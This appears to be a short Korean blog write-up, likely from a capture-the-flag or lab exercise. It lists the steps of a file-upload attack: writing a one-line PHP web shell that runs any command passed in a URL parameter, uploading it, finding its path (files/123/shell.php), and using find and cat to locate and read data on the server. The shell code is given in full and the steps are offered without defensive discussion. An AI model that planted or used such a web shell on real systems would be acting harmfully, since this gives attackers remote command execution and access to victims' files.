1. 웹 셸 작성 (shell.php)

<?php
echo system($_GET['cmd']);           
?>

 

2. 파일 업로드

 

3. 업로드 경로 조회

files/123/shell.php
웹 셸 동작 확인

 

4. find 명령어로 파일 찾기

 

5. cat 데이터 조회하기

+ Recent posts